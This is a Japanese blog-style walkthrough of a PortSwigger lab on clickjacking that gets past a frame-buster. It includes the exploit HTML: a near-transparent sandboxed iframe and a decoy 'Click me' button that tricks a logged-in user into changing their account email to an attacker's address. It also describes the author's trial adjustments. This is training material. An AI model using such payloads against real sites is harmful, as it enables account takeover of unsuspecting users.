Hello there, ('ω')ノ

 

フレームバスタースクリプトを使用したクリックジャッキングを。

このラボは、Webサイトがフレーム化されるのを防ぐ。

フレームバスターによって保護されていて。

フレームバスターを回避するクリックジャッキング攻撃でメールアドレスを変更して。

 

まずは、ログインして。

 

 

メールアドレスの変更を。

 

 

メールアドレスを変更をするリクエストを確認して。

 

 

ソースコードを確認すると。

Updateボタンで、下記へ遷移するようで。

　/my-account/change-email

 

 

ただし、メールアドレスを変更するリクエストは下記のとおりで。

クリックジャッキングでUpdateをクリックさせるようにするためのページで。

 

 

エクスプロイトサーバーで、下記のHTMLを挿入して。

PortSwiggerのSolutionに書かれているパラメータだとうまくいかないので。

一部を変更して。

 

<style>
iframe {
position:relative;
width:700px;
height: 600px;
opacity: 0.0001;
z-index: 2;
}
div {
position:absolute;
top:485px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms"
src="https://ac6b1f1c1ffdc1b380c2389c005200a0.web-security-academy.net/my-account?id=wiener&email=hacker@attacker-website.com"></iframe>

 

 

わかりやすくするために透過する数値を変えてみて。

View exploiteで、Click meがUpdateボタンの上になるように位置を調整して。

 

　opacity: 0.4001;

 

 

Click meをクリックするといつもの画面遷移が。

 

 

あたらめてページを確認するとメールアドレスが変更されているももの。

なぜかクリアできないようで。

 

 

ちなみにメール変更のリクエストのメソッドを変更して。

 

 

下記のURLを組み込んでエクスプロイトに組み込んでみると。

 

　/my-account/change-email?email=user%40mail.com&csrf=g6ANNnKNwfu7JL9cSRElP5ssgcAbhZ8m

 

 

ページが表示されないのでボタンすら押せず。

 

 

idパラメータを除いて。

下記のURLを組み込んでエクスプロイトに組み込んで実行してみると。

なぜかクリアできたものの、実際にはメールアドレスは変更されず。

問題に対するサイトの作りに問題があるのではと。

 

　/my-account?email=hacker@attacker-website.com

 

 

Best regards, (^^ゞ